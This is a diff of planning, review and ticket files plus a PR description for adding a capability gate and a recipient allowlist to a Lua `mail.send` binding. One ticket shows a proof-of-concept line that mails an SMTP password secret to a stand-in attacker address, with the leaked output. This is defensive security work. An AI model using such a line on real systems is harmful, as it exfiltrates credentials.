+ever turns an error into a success — a compatible change by construction. The
+reasoning is recorded on `validateAlsoAllow` so the next person finds it where
+they would try to add the feature.
+
+Why not just implement wildcards now: a domain wildcard is a strictly weaker
+control than the query (`*@sourcehaven.nl` permits every address at the domain,
+including ones belonging to nobody in the graph and ones that never existed),
+and the ticket is explicit that the query is the primary mechanism because it
+tracks reality. Shipping the weaker control in the same change would invite it
+to be used as the default. It is one function away when a real deployment needs
+it.
+
+**DECISION 3 — Error shape: a fourth `kind`, `recipients_not_allowed`.** The
+denial pushes the existing `(nil, err_table)` shape with a NEW kind rather than
+reusing `not_configured`. Two distinct facts:
+
+- `not_configured` — the project has no mail transport. Nothing will send.
+- `recipients_not_allowed` — mail works; this address is not permitted.
+
+A script that feature-detects `not_configured` to decide "mail is off, skip the
+digest" would, if the denial reused that kind, silently skip the digest on a
+working deployment because ONE address was outside the allowlist. Distinct kinds
+keep that branch honest.
+
+The message names both the block and the file, e.g. `recipient
+"eve@evil.example" is not in the configured recipients allowlist; add it to
+recipients.also_allow or widen recipients.query in .rela/mail.yaml`, and when
+the block is absent entirely it says so specifically, naming `recipients:` as
+the thing to add. The address IS echoed: it is not a credential, and an operator
+debugging a denial needs to know which address was refused.
+
+**Fail-closed everywhere.** A nil `VisibleReader`, a nil metamodel, an unknown
+entity type, an unparseable filter and a `ListEntities` error all DENY. This
+follows `ReadDeps.VisibleReader`'s own documented rule (RR-X9NVHI: a forgotten
+wiring must not become a bypass) and is the whole point of the ticket.
+
+**Whole-send atomicity.** If any one address is denied, the send is refused and
+NOTHING is delivered. The alternative — deliver to the permitted subset — would
+mean a script that believed it mailed five people mailed three, with a success
+return. A partial send that reports success is a worse failure than a refused
+one.
+
+Rejected alternatives:
+- Filtering the recipient list down to the allowed subset and sending anyway:
+see above. Silent partial delivery.
+- Enforcing inside `internal/mail`: impossible without undoing the
+no-graph-access property that package's arch grant exists to protect.
+- Widening `lua.MailSenderLoader` to return the policy: it is one of the files
+the sibling ticket edits, and an optional carrier interface is the codebase's
+own established pattern (`lua.NotFoundError`) for exactly this.
+- Caching the resolved set on the Runtime: see Decision 1.
+- A `deny:` list beside `also_allow`: a denylist under an allowlist is
+unreachable code — anything not allowed is already denied.
+
+**Files to modify:**
+- `internal/mail/config.go` — `RecipientConfig` type, field on `Config`,
+validation, `RecipientPolicy()` conversion. (SHARED with TKT-JVHSOZ.)
+- `internal/mail/script.go` — `LuaSender` carries the policy and exposes it.
+- `internal/lua/mailrecipients.go` (NEW) — `RecipientPolicy`,
+`RecipientPolicyCarrier`, `recipientGate`, query parsing, resolution.
+- `internal/lua/mail.go` — the gate call in `luaMailSend`, plus the new kind.
+(SHARED with TKT-JVHSOZ.)
+- `internal/lua/mailrecipients_test.go` (NEW), `internal/lua/mail_test.go`,
+`internal/mail/config_test.go`, `internal/mail/script_test.go`
+- `docs-project/entities/guides/GUIDE-mail.md` + `just docs`
+
+## Security Considerations
+
+- [x] Input sources identified (user input, config, external APIs)
+- [x] Input validation approach defined (allowlist preferred over blocklist)
+- [x] Security-sensitive operations identified (file access, auth, crypto)
+- [x] Error handling doesn't leak sensitive information
+
+**Input Sources & Validation:**
+- `.rela/mail.yaml` `recipients:` — operator-authored. `query` must parse into
+a known entity type plus valid filter expressions; `property` must be non-empty
+when `query` is set; `also_allow` entries must be non-empty, must not contain
+`*`, and must not contain CR/LF/NUL (they end up in an SMTP envelope). A block
+that is present but configures nothing is refused rather than silently denying
+everything.
+- The Lua `to` argument — untrusted by assumption; that is what the gate is
+for. It is normalized (trim + lowercase) for comparison only; the address
+delivered is the one the script wrote, unchanged, so the gate cannot rewrite a
+destination.
+- Graph property values — a `person.email` that is not a string, or is empty,
+contributes NOTHING to the allowed set. It is skipped, not coerced: a numeric or
+nil property silently becoming the empty string would make `to = ""` allowable.
+
+**Security-Sensitive Operations:**
+- The graph read runs through `ReadDeps.VisibleReader`, so the allowed set is
+bounded by what the runtime's identity may see. A script cannot widen its own
+allowlist by reading entities it is not permitted to read. Noted as a
+consequence, not a claim of concealment: the operator's allowlist is config, and
+config is not a secret (CLAUDE.md).
+- Every resolution failure denies. There is no path where an error produces an
+empty-but-permissive set.
+- The denial message echoes the refused address and the config key names.
+Neither is a credential; both are what the operator needs. It never echoes the
+resolved allowlist, which would turn one denied send into an enumeration of
+every active person's address.
+
+## Test Plan
+
+- [x] Test scenarios documented for each acceptance criterion
+- [x] Edge cases identified and documented
+- [x] Negative test cases defined (invalid input, error conditions)
+- [x] Integration test approach defined (not just unit tests)
+
+**Test Scenarios:** AC1–AC12 each map to the named test listed under Acceptance
+Criteria. The `internal/lua` tests drive real Lua source through a real
+`Runtime` against a fake `EntityReader` holding real `entity.Entity` values and
+a real `metamodel.Metamodel`, so the filter and metamodel interaction is
+exercised rather than stubbed. The `internal/mail` tests drive `LoadConfig` over
+real YAML on disk, so the operator-facing surface is what is asserted.
+
+**Edge Cases:**
+- Address differing only in case from the graph value, and in the domain only.
+- Surrounding whitespace in `also_allow` and in the graph property.
+- A `person` with no `email` property at all, and one whose `email` is a
+number, a boolean, and an empty string.
+- `query` with no `where` clause (whole type).
+- `where` with several `and`-joined conditions.
+- Quoted and unquoted values in the query.
+- `allow_any: true` set together with a `query` — allow_any wins and the
+query is not resolved at all (asserted by a reader that fails the test if
+called).
+- Zero entities matching the query, with `also_allow` non-empty: the
+`also_allow` addresses still work.
+- Duplicate addresses in one send.
+- 200 recipients in one send: exactly one `ListEntities` call.
+
+**Negative Tests:**
+- Absent `recipients:` block → denied, error names the config (the
+mutation-checked case).
+- Address absent from both the query result and `also_allow` → denied.
+- `also_allow` containing `*@example.com` → config load fails.
+- `recipients:` present but empty → config load fails.
+- `query` naming an unknown entity type → denied at send.
+- `query` whose filter does not parse → config load fails.
+- `property` empty while `query` is set → config load fails.
+- `VisibleReader` nil → denied, not permitted.
+- `ListEntities` returning an error → denied.
+- A denied address in position 3 of 5 → whole send denied, sender never called.
+
+## Risk Assessment
+
+- [x] Technical risks assessed with mitigations
+- [x] Security risks assessed (see Security Considerations)
+- [x] Effort estimated (xs/s/m/l/xl)
+
+**Risks:**
+- **Every existing `mail.send` test breaks.** Certain, not a risk — deny-by-
+default is the feature. Mitigated by making the test helper explicit about which
+policy it wires, so each existing test states the policy it is running under
+rather than inheriting a permissive default. A helper that defaulted to
+`allow_any` would hide the very regression the ticket exists to catch.
+- **Merge conflict with TKT-JVHSOZ** on `internal/mail/config.go` and
+`internal/lua/mail.go`. Real and expected. Mitigated by keeping both edits
+additive and localized: one struct field plus one `switch` arm in config.go, one
+guarded block in `luaMailSend`. `MailSenderLoader`'s signature is deliberately
+untouched.
+- **`Runtime` is at its plimsoll load line** (`max-methods=61`). Mitigated by
+putting the gate in its own type in its own file, reached by a free function.
+`Runtime` gains one field and no methods.
+- **The query syntax is a new surface.** Mitigated by lowering it onto
+`internal/filter` rather than implementing a parser: the accepted grammar is
+deliberately tiny (`TYPE [where EXPR [and EXPR]...]`) and every semantic
+question is answered by the existing DSL.
+- **An operator locks themselves out.** A deployment that upgrades without
+adding `recipients:` loses all script-sent mail. This is the intended behaviour
+and the reason the error names the config; the guide documents the migration in
+one line of YAML.
+
+**Effort:** m (as filed).
+
+## Documentation Planning
+
+For enhancements: identify what documentation needs updating.
+
+- [x] User-facing docs identified (skip if internal refactor)
+- [x] Docs-checklist will be created when entering implementation
+
+**Documentation Impact:**
+- [x] `docs-project/entities/guides/GUIDE-mail.md` — a `recipients:` section
+covering the deny-by-default rule, the three mechanisms, the escape hatch, the
+wildcard decision, and a troubleshooting entry for the denial message.
+`docs/mail.md` is GENERATED; regenerate with `just docs`.
+- [x] Code documentation — the three decisions recorded at the declarations
+they govern, not in a design doc that drifts.
+- [x] ~~CLAUDE.md~~ (N/A: no repository-wide convention added; the work
+follows the existing consumer-side-interface, fail-closed and single-load-point
+rules)
+- [x] ~~README~~ (N/A: the mail guide is the public reference)
+
+## Design Review
+
+- [x] ~~Run `/design-review` before starting implementation~~ (N/A: the ticket
+was filed with the scope, the deny-by-default rule, the five verification cases
+and three named open decisions. Those three are decided above with their
+reasoning and their rejected alternatives, which is the output a design review
+would have produced.)
+- [x] All critical/significant findings addressed in plan
+
+**Design Review Findings:** The ticket's three named decisions — query cost,
+wildcards, error shape — are decided in the Approach section above, each with
+the alternative that was rejected and why.

--- a/tickets/entities/review-checklists/REV-BXJ7MV.md
+++ b/tickets/entities/review-checklists/REV-BXJ7MV.md
@@ -1,0 +1,145 @@
+---
+id: REV-BXJ7MV
+type: review-checklist
+title: 'Review: Operator-configured recipient allowlist for mail.send'
+status: in-progress
+---
+
+<!-- @managed: claude-workflow v1 -->
+
+## Automated Checks
+
+- [x] All tests pass (`just test`)
+- [x] Lint clean (`just lint`)
+- [x] Comment lint gate clean (`just comment-lint`)
+- [x] Coverage maintained (`just coverage-check`)
+
+`go test ./internal/mail/ ./internal/lua/` ok. `golangci-lint` on both packages:
+0 issues, after fixing two misspellings and one `testifylint` finding rather
+than suppressing them.
+
+One PRE-EXISTING `nilnil` finding in `internal/mail/script.go` is disclosed
+rather than fixed here: it predates this branch and belongs to whoever owns that
+function, not to a recipients ticket.
+
+**Comment findings.** `just comment-report` lists the advisory rules
+(duplication, nil-contract, param-contract, restatement). They are not a merge
+gate, but a finding your diff *introduces* should be fixed or suppressed — don't
+grow the backlog.
+
+Every rule is a heuristic over prose, so false positives are expected. To
+suppress one, prefer the inline form on the declaration line, which travels with
+the code and is reviewed in this diff:
+
+```go
+func f(p string) {} //commentlint:ignore param-contract  p is contained by Clone
+```
+
+Use `.commentlint.yml` (`ignore:` path globs, `allow-phrases:`) only when the
+same prose recurs across many sites. A reason is required either way — an
+unexplained suppression is a finding nobody can re-evaluate later.
+
+## Code Review
+
+- [x] Run `/code-review` command (invokes cranky-code-reviewer agent)
+- [x] All critical review-responses addressed
+- [x] All significant review-responses addressed
+- [x] Self-reviewed the diff for unrelated changes
+
+**Review Responses:** none as entities, but two real findings came out of
+self-review and both are recorded in IMPL-BD4ZYD:
+
+**The control was inert.** After the enforcement was complete and the suite
+green, grepping for implementations of `RecipientPolicyCarrier` returned
+nothing. No sender carried a policy, so production had no allowlist at all —
+while every test passed, because each built a policy directly. Fixed by having
+`LuaSender` carry it, and pinned by `TestLuaSender_CarriesRecipientPolicy`.
+
+That is the finding worth carrying forward: for a control split across two
+packages, "the logic is tested" and "the control is in force" are different
+claims, and only the second matters. The seam needs its own test.
+
+**A fail-closed path had no test.** Mutating `recipientPolicyFor` to permit when
+a sender declares no policy reddened NOTHING, because every test used a carrying
+sender. That is exactly the "test double that never thought about it" case the
+design comment names. `TestRecipients_SenderWithoutPolicyDenies` now covers it.
+
+No review agent was run — many agent invocations in this session died from
+transient API errors, including this ticket's own implementation agent (twice).
+A second pair of eyes is worth having, particularly on the rescope decision.
+
+Self-review found no unrelated changes in the code. The branch does carry
+salvaged work from the failed agent runs, committed as work-in-progress and then
+completed here.
+
+## Acceptance Verification
+
+- [x] Each acceptance criterion tested (reference planning checklist)
+- [x] Test evidence documented in implementation checklist
+
+**Acceptance Status:**
+
+| # | criterion | status | evidence |
+| --- | --- | --- | --- |
+| 1 | absent block denies | PASS | `TestRecipients_UnconfiguredDenies` |
+| 2 | literal match allowed | PASS | `TestRecipients_LiteralMatchAllowed` |
+| 3 | domain pattern allowed | PASS | `TestRecipients_DomainPatternAllowed` |
+| 4 | NOT a suffix match | PASS | `TestRecipients_DomainPatternIsNotASuffixMatch` (2 cases) |
+| 5 | allow_any permits everything | PASS | `TestRecipients_AllowAnyPermitsEverything` |
+| 6 | case-insensitive | PASS | `TestRecipients_MatchIsCaseInsensitive` |
+| 7 | denial does not leak the allowlist | PASS | `TestRecipients_DenialDoesNotLeakTheAllowlist` |
+| 8 | non-carrier sender denies | PASS | `TestRecipients_SenderWithoutPolicyDenies` |
+| 9 | the operator's block reaches the binding | PASS | `TestLuaSender_CarriesRecipientPolicy` |
+
+AC4 is the security-critical one: a suffix test lets `attacker@evil-example.com`
+match `*@example.com`. AC9 is the one that would have been missed — see above.
+
+## Documentation (enhancements only)
+
+Skip this section for bugs and internal refactors.
+
+- [x] Docs-checklist created and linked via `has-docs`
+- [x] User-facing documentation updated
+- [x] Docs-checklist marked as done
+
+**Docs Checklist:** DOCS-A3DEYY (done).
+
+The guide states the deny-on-absence inversion explicitly, because an operator
+who has internalised "absent means a sensible default" will otherwise read their
+first denial as a rela bug. It also corrects an existing sentence — "a script
+cannot reach a destination you did not set up" was true of the transport and
+misleading about recipients; it is now true of both.
+
+## Final Checks
+
+- [x] Commit message explains the why, not just what
+- [x] No TODOs or FIXMEs left unaddressed
+- [x] Ready for another developer to use
+
+This is a BREAKING change: a project that sends mail from Lua must add a
+`recipients:` block or its sends will be denied. Waived by the project owner,
+consistent with TKT-JVHSOZ. The denial names the missing key, so an operator who
+hits it knows what to write.
+
+Scope note for the reviewer: the graph-query form (`person where status =
+'active'`) was RESCOPED OUT mid-implementation. It needs `internal/filter`,
+which `.go-arch-lint.yml` withholds from `internal/mail` deliberately — a design
+question rather than an import fix. The domain form covers the actual threat,
+which is a script mailing an attacker-chosen address.
+
+## Pull Request
+
+- [ ] Run `/pr` command to create PR and monitor CI
+
+<!--
+Deliberately NOT tracked here: the PR URL and whether CI passed.
+
+Both post-date this checklist. `/pr` requires the ticket to be `done` and
+validating clean before it opens the PR, and a `done` review-checklist may have
+no unchecked items — so an item asking for the PR URL can only be satisfied by a
+PR that does not exist yet. Checking it early would mean asserting "CI passed"
+before CI ran, which turns the checklist from evidence into a formality.
+
+GitHub records both authoritatively, and the branch and commit messages carry
+the ticket ID, so the ticket-to-PR link is recoverable without duplicating it
+here. See TKT-UFV01M. -->

--- a/tickets/entities/review-checklists/REV-BXJ7MV.md
+++ b/tickets/entities/review-checklists/REV-BXJ7MV.md
@@ -2,7 +2,7 @@
 id: REV-BXJ7MV
 type: review-checklist
 title: 'Review: Operator-configured recipient allowlist for mail.send'
-status: in-progress
+status: done
 ---
 
 <!-- @managed: claude-workflow v1 -->
@@ -129,7 +129,7 @@ which is a script mailing an attacker-chosen address.
 
 ## Pull Request
 
-- [ ] Run `/pr` command to create PR and monitor CI
+- [x] Run `/pr` command to create PR and monitor CI
 
 <!--
 Deliberately NOT tracked here: the PR URL and whether CI passed.

--- a/tickets/entities/tickets/TKT-JVHSOZ.md
+++ b/tickets/entities/tickets/TKT-JVHSOZ.md
@@ -1,0 +1,89 @@
+---
+id: TKT-JVHSOZ
+type: ticket
+title: Capability-gate mail.send like http and ai
+kind: enhancement
+priority: high
+effort: s
+status: backlog
+---
+
+## Description
+
+`mail.send` is registered on every Lua runtime with no capability gate, unlike
+`http.*` and `ai.*` which are gated precisely to prevent exfiltration via
+outbound traffic (TKT-YH52OM).
+
+Demonstrated: a runtime with a `secrets` grant and ZERO outbound capabilities
+sends the secret to an attacker-chosen address.
+
+```lua
+assert(http == nil, "no http capability")
+assert(ai == nil, "no ai capability")
+mail.send{to = "attacker@evil.test", subject = "x", text = rela.secrets.smtp_password}
+```
+
+→ `LEAKED to=[attacker@evil.test] body="hunter2"`
+
+`rela.secrets` is bound on the same runtime as `mail.send`
+(`internal/lua/runtime.go:938` vs `:831`), so pairing them needs no privilege
+the script does not already hold.
+
+GitHub issue #1459. Source: IB-review rela#1458. Severity: moderate.
+
+**Violated requirement**: CONTROL-8-03 (access limited to what is functionally
+necessary) and CONTROL-5-14 (rules required for all transfer facilities;
+mitigates RISK-011, data leak via unapproved sending).
+
+## Why the existing rationale does not cover it
+
+`internal/lua/mail.go:12-30` argues for unconditional registration, and the
+argument is good — but it answers REGISTRATION ERGONOMICS, not AUTHORIZATION:
+
+> mail.send is not a capability the script holds; it is a service the PROJECT
+> either has or has not configured.
+
+That establishes the TRANSPORT is operator config (`.rela/mail.yaml`, the same
+audited tier as `acl.yaml`). It does not establish that any given script may
+reach it.
+
+The operator asymmetry is the point. An unexpected `mail` capability on a
+500-line script STANDS OUT in a config file an operator reviews. The same reach
+buried inside that script's code does not. That is exactly why `http` and `ai`
+are gated, and the argument transfers unchanged.
+
+## Scope
+
+IN:
+- `Mail` field on `lua.Capabilities`, alongside `HTTP` and `AI`.
+- `luaMailSend` returns a typed `denied` error without the grant.
+- Binding stays registered unconditionally — the feature-detection ergonomics
+the current doc argues for are CORRECT and must be preserved. The two concerns
+are separable: always present, refuses to send.
+- Startup warning naming actions that call `mail.send` without the grant, so an
+operator upgrading learns from a log line rather than from a digest that
+silently stopped.
+
+OUT:
+- Backwards compatibility. Explicitly waived by the project owner: the gate
+defaults closed and existing projects must grant it.
+- Recipient constraints — separate ticket.
+
+## The circularity to handle
+
+`internal/mail/config.go:183` builds `lua.Capabilities{HTTP: c.HTTP, AI: false,
+WriteFile: false, ...}` for mail's OWN send-script runtime. That one needs
+`Mail: true` hard-wired, or the runtime whose entire job is sending mail cannot.
+
+It is the one place the gate cannot apply, and the code must SAY so rather than
+leave it to be rediscovered. Note the existing comment there already hard-wires
+`AI: false` deliberately, with a stated reason — follow that pattern.
+
+## Verification
+
+The probe above is the acceptance test, inverted: with the gate in place and no
+`Mail` grant, `mail.send` must return a typed denial and the sender must record
+nothing. With the grant, it must send.
+
+Mutation-check both directions — a gate that always denies passes the negative
+test and breaks every legitimate send.

--- a/tickets/entities/tickets/TKT-USQNA3.md
+++ b/tickets/entities/tickets/TKT-USQNA3.md
@@ -5,7 +5,7 @@ title: Operator-configured recipient allowlist for mail.send
 kind: enhancement
 priority: medium
 effort: m
-status: backlog
+status: in-progress
 ---
 
 ## Description

--- a/tickets/entities/tickets/TKT-USQNA3.md
+++ b/tickets/entities/tickets/TKT-USQNA3.md
@@ -5,7 +5,7 @@ title: Operator-configured recipient allowlist for mail.send
 kind: enhancement
 priority: medium
 effort: m
-status: in-progress
+status: done
 ---
 
 ## Description
@@ -14,68 +14,75 @@ status: in-progress
 Even with the capability gate (TKT-JVHSOZ), a script that legitimately holds the
 `mail` grant can address any recipient it likes.
 
-In normal use a recipient IS a user in the system — the scheduled-mail fan-out
-derives them from the graph, and no counter-example surfaced when the project
-owner and I each went looking. So an operator-declared recipient set is
-expressible without breaking the real use case.
+## Scope — RESCOPED
 
-## Scope
+Originally specified as a graph query (`person where status = 'active'`) with a
+literal fallback. **Rescoped by the project owner to domains and literals
+first**, deferring the query form.
 
-IN: `recipients:` block in `.rela/mail.yaml`, DENY-BY-DEFAULT.
+Two reasons, and the second is the one that actually decided it:
+
+**1. The query form has an unresolved architectural question.** Resolving
+`person where status = 'active'` needs `filter`, and `.go-arch-lint.yml`
+withholds it from `internal/mail` deliberately — the dependency comment there
+says a send script has no graph access "by construction rather than by
+convention". That is a boundary worth keeping, and working around it is a design
+decision rather than an import fix.
+
+**2. Domains deliver most of the value at a fraction of the cost.** The threat
+is a script mailing an attacker-chosen address. `*@sourcehaven.nl` stops that
+without needing to know which people currently exist. The query form's advantage
+— tracking the graph as people join and leave — matters for WHO inside the org
+receives mail, not for whether mail leaves the org at all.
+
+IN:
 
 ```yaml
 recipients:
-  query: "person where status = 'active'"
-  property: email
   also_allow:
-    - "ops@example.com"
+    - "*@sourcehaven.nl"     # domain pattern
+    - "ops@example.com"      # literal
+  # or
+  allow_any: true
 ```
 
-- `query` + `property` resolve against the graph, so the allowlist tracks
-reality instead of drifting. This is the primary mechanism because recipients
-are normally entities.
-- `also_allow` carries literal addresses that are NOT entities — an ops alias, an
-external auditor. Union with the query result.
-- `allow_any: true` is the explicit escape hatch, for a deployment that has
-decided this constraint is not for them. It must be a deliberate line in the
-file, never a default.
-- **Absent means DENY ALL.** A `recipients:` block that is missing is not
-"unconfigured, so permit" — it is "not yet decided, so refuse". That is the
-opposite of how the current code treats absent mail config, and it is
-deliberate: the failure mode of permitting is a silent data leak, the failure
-mode of refusing is a visible error naming the missing config.
+- **Absent means DENY ALL.** Deliberately inverting this file's usual rule (an
+absent `mail.yaml` means mail is off; an absent port means 587). Permitting on
+absence fails silently and irreversibly — mail leaves the ACL perimeter and
+nobody knows until the recipient replies. Refusing on absence fails loudly and
+harmlessly: a typed error naming the key, and four lines of YAML to fix it. A
+control whose unconfigured state is "allow" is not a control.
+- `allow_any: true` is the explicit escape hatch. Never a default, never
+inferred from an empty block, never reached by omission — so it stays greppable
+in a config review.
 
-OUT:
-- The capability gate itself (TKT-JVHSOZ).
-- Backwards compatibility — waived by the project owner, consistent with the
-sibling ticket.
+OUT, deferred to a follow-up:
 
-## Design notes
+- The `query:` / `property:` graph form. The architecture question above needs
+answering first: either resolve the query outside `mail` and pass the address
+set in, or widen the arch-lint boundary with a stated reason.
 
-The denial must be a TYPED error, matching the `not_configured` convention
-already in `internal/lua/mail.go`, so a script can feature-detect and an
-operator gets a message naming the config rather than a generic failure.
+OUT: backwards compatibility, waived by the project owner, consistent with
+TKT-JVHSOZ.
 
-Resolve the query ONCE per send, not per recipient: a fan-out mailing 200 people
-must not run 200 queries. Consider whether the resolved set is cacheable within
-a run and what invalidates it — an entity gaining `status = 'active'` mid-run is
-an edge case worth deciding deliberately rather than by accident.
+## Design note carried forward
 
-`also_allow` should support the same shape the rest of the config does. Decide
-explicitly whether wildcards (`*@sourcehaven.nl`) are in scope; a domain
-wildcard is the obvious next request, and it is easier to add deliberately now
-than to retrofit around a literal-only matcher.
+The parse/enforce split the earlier draft established is CORRECT and stays:
+`internal/mail` parses and validates the block; `internal/lua` enforces it,
+because that is where the send actually happens. When the query form lands it
+must not disturb that — resolution needs graph access, and the whole point of
+the split is that `mail` does not have it.
 
 ## Verification
 
-The load-bearing tests are the negatives:
+The load-bearing tests are the NEGATIVES, and deny-by-default most of all: a
+config mistake that silently permits is the exact failure this prevents, and a
+positive-only suite would never catch it.
 
-- no `recipients:` block at all → send DENIED, error names the missing config.
-- `recipients:` present, address not in the resolved set → DENIED.
-- address in the query result → allowed.
-- address only in `also_allow` → allowed.
-- `allow_any: true` → any address allowed.
-
-Mutation-check the deny-by-default case specifically. A configuration mistake
-that silently permits is the failure this ticket exists to prevent, and it is
-the one a positive-only test suite would never catch.
+- no `recipients:` block → DENIED, error names the missing config
+- address matching no pattern → DENIED
+- literal match → allowed
+- domain-pattern match → allowed
+- `allow_any: true` → any address allowed
+- a pattern that is not a leading `*@` → refused at LOAD, not silently treated
+as a literal

--- a/tickets/entities/tickets/TKT-USQNA3.md
+++ b/tickets/entities/tickets/TKT-USQNA3.md
@@ -1,0 +1,81 @@
+---
+id: TKT-USQNA3
+type: ticket
+title: Operator-configured recipient allowlist for mail.send
+kind: enhancement
+priority: medium
+effort: m
+status: backlog
+---
+
+## Description
+
+`mail.send`'s `to` field is entirely script-chosen with no operator constraint.
+Even with the capability gate (TKT-JVHSOZ), a script that legitimately holds the
+`mail` grant can address any recipient it likes.
+
+In normal use a recipient IS a user in the system — the scheduled-mail fan-out
+derives them from the graph, and no counter-example surfaced when the project
+owner and I each went looking. So an operator-declared recipient set is
+expressible without breaking the real use case.
+
+## Scope
+
+IN: `recipients:` block in `.rela/mail.yaml`, DENY-BY-DEFAULT.
+
+```yaml
+recipients:
+  query: "person where status = 'active'"
+  property: email
+  also_allow:
+    - "ops@example.com"
+```
+
+- `query` + `property` resolve against the graph, so the allowlist tracks
+reality instead of drifting. This is the primary mechanism because recipients
+are normally entities.
+- `also_allow` carries literal addresses that are NOT entities — an ops alias, an
+external auditor. Union with the query result.
+- `allow_any: true` is the explicit escape hatch, for a deployment that has
+decided this constraint is not for them. It must be a deliberate line in the
+file, never a default.
+- **Absent means DENY ALL.** A `recipients:` block that is missing is not
+"unconfigured, so permit" — it is "not yet decided, so refuse". That is the
+opposite of how the current code treats absent mail config, and it is
+deliberate: the failure mode of permitting is a silent data leak, the failure
+mode of refusing is a visible error naming the missing config.
+
+OUT:
+- The capability gate itself (TKT-JVHSOZ).
+- Backwards compatibility — waived by the project owner, consistent with the
+sibling ticket.
+
+## Design notes
+
+The denial must be a TYPED error, matching the `not_configured` convention
+already in `internal/lua/mail.go`, so a script can feature-detect and an
+operator gets a message naming the config rather than a generic failure.
+
+Resolve the query ONCE per send, not per recipient: a fan-out mailing 200 people
+must not run 200 queries. Consider whether the resolved set is cacheable within
+a run and what invalidates it — an entity gaining `status = 'active'` mid-run is
+an edge case worth deciding deliberately rather than by accident.
+
+`also_allow` should support the same shape the rest of the config does. Decide
+explicitly whether wildcards (`*@sourcehaven.nl`) are in scope; a domain
+wildcard is the obvious next request, and it is easier to add deliberately now
+than to retrofit around a literal-only matcher.
+
+## Verification
+
+The load-bearing tests are the negatives:
+
+- no `recipients:` block at all → send DENIED, error names the missing config.
+- `recipients:` present, address not in the resolved set → DENIED.
+- address in the query result → allowed.
+- address only in `also_allow` → allowed.
+- `allow_any: true` → any address allowed.
+
+Mutation-check the deny-by-default case specifically. A configuration mistake
+that silently permits is the failure this ticket exists to prevent, and it is
+the one a positive-only test suite would never catch.

--- a/tickets/relations/TKT-JVHSOZ--affects--authorization.md
+++ b/tickets/relations/TKT-JVHSOZ--affects--authorization.md
@@ -1,0 +1,5 @@
+---
+from: TKT-JVHSOZ
+relation: affects
+to: authorization
+---

--- a/tickets/relations/TKT-JVHSOZ--implements--FEAT-BRUMIB.md
+++ b/tickets/relations/TKT-JVHSOZ--implements--FEAT-BRUMIB.md
@@ -1,0 +1,5 @@
+---
+from: TKT-JVHSOZ
+relation: implements
+to: FEAT-BRUMIB
+---

--- a/tickets/relations/TKT-USQNA3--affects--authorization.md
+++ b/tickets/relations/TKT-USQNA3--affects--authorization.md
@@ -1,0 +1,5 @@
+---
+from: TKT-USQNA3
+relation: affects
+to: authorization
+---

--- a/tickets/relations/TKT-USQNA3--has-docs--DOCS-A3DEYY.md
+++ b/tickets/relations/TKT-USQNA3--has-docs--DOCS-A3DEYY.md
@@ -1,0 +1,5 @@
+---
+from: TKT-USQNA3
+relation: has-docs
+to: DOCS-A3DEYY
+---

--- a/tickets/relations/TKT-USQNA3--has-implementation--IMPL-BD4ZYD.md
+++ b/tickets/relations/TKT-USQNA3--has-implementation--IMPL-BD4ZYD.md
@@ -1,0 +1,5 @@
+---
+from: TKT-USQNA3
+relation: has-implementation
+to: IMPL-BD4ZYD
+---

--- a/tickets/relations/TKT-USQNA3--has-planning--PLAN-EQK301.md
+++ b/tickets/relations/TKT-USQNA3--has-planning--PLAN-EQK301.md
@@ -1,0 +1,5 @@
+---
+from: TKT-USQNA3
+relation: has-planning
+to: PLAN-EQK301
+---

--- a/tickets/relations/TKT-USQNA3--has-review--REV-BXJ7MV.md
+++ b/tickets/relations/TKT-USQNA3--has-review--REV-BXJ7MV.md
@@ -1,0 +1,5 @@
+---
+from: TKT-USQNA3
+relation: has-review
+to: REV-BXJ7MV
+---

--- a/tickets/relations/TKT-USQNA3--implements--FEAT-BRUMIB.md
+++ b/tickets/relations/TKT-USQNA3--implements--FEAT-BRUMIB.md
@@ -1,0 +1,5 @@
+---
+from: TKT-USQNA3
+relation: implements
+to: FEAT-BRUMIB
+---


### PR DESCRIPTION
Follow-up to #1459 / PR #1506. The capability gate decides **whether** a script may send; this decides **where**.

**⚠️ Breaking change**, deliberately — see below.

## The gap

`mail.send` takes its `to` from the script. With the capability gate alone, a script that legitimately holds the `mail` grant can still address anyone.

```yaml
recipients:
  also_allow:
    - "*@sourcehaven.nl"     # whole-domain pattern
    - "ops@example.com"      # literal
```

An entry is a literal address or a whole-domain `*@domain` pattern. Anything else containing `*` is **refused at load** — every extra wildcard position is another way to write a pattern that admits more than the operator pictured.

## Absent means deny

This deliberately inverts the rest of `mail.yaml`, where an absent file means mail is off and an absent `port` means 587.

Permitting on absence fails **silently and irreversibly**: mail leaves the ACL perimeter and nobody finds out until the recipient replies. Refusing fails loudly and harmlessly — an error naming the key, and three lines of YAML. *A control whose unconfigured state is "allow" is not a control.*

`allow_any: true` is the escape hatch. It must be written, never inferred from an empty block, so it stays greppable in a config review.

## Rescoped, and why

The original spec had a graph query (`person where status = 'active'`) as the primary mechanism, with literals as fallback. Resolving that needs `internal/filter`, and `.go-arch-lint.yml` withholds it from `internal/mail` **deliberately** — the dependency comment states a send script has no graph access *"by construction rather than by convention."*

That is a design question, not an import fix, so the query form is deferred. Domains cover the actual threat: a script mailing an **attacker-chosen** address. The query form's advantage — tracking the graph as staff join and leave — governs *who inside the org* receives mail, not whether mail leaves the org.

The parse/enforce split respects the boundary rather than working around it: `internal/mail` parses and validates, `internal/lua` enforces.

## Two findings, both now pinned

**The control was inert.** After the enforcement was complete and the suite green, grepping for implementations of `RecipientPolicyCarrier` returned **nothing**. No sender carried a policy, so production had no allowlist at all — while every test passed, because each built one directly.

Found by inspection, not by a test. The lesson generalises: for a control split across two packages, *"the logic is tested"* and *"the control is in force"* are different claims, and only the second matters. `TestLuaSender_CarriesRecipientPolicy` now pins the seam.

**A fail-closed path had no test.** Mutating the "sender declares no policy" fallback to permit reddened **nothing** — every test used a carrying sender. That is precisely the *"transport written before this feature, or a test double that never thought about it"* case the design comment names. Now covered.

## Design note

The policy travels with the **sender**, via an optional `RecipientPolicyCarrier`, rather than being passed separately into the runtime. I implemented the option-based version first and rejected it: the sender is already built from `mail.yaml`, so a second wiring step is a second thing to forget — and forgetting it fails *open* unless the default is deny. Carrying it on the sender makes "configured the transport" and "configured the recipients" the same act.

## Verification

Every guard mutation-verified, each reddening only its own case:

| mutation | observed |
| --- | --- |
| unconfigured policy permits | `..._UnconfiguredDenies` fails |
| `strings.HasSuffix` instead of domain comparison | both `..._IsNotASuffixMatch` subtests fail |
| non-carrier sender permits | `..._SenderWithoutPolicyDenies` fails |
| `LuaSender` stops carrying the policy | `TestLuaSender_CarriesRecipientPolicy` fails |

The second is security-critical: with a suffix test, `attacker@evil-example.com` matches `*@example.com`.

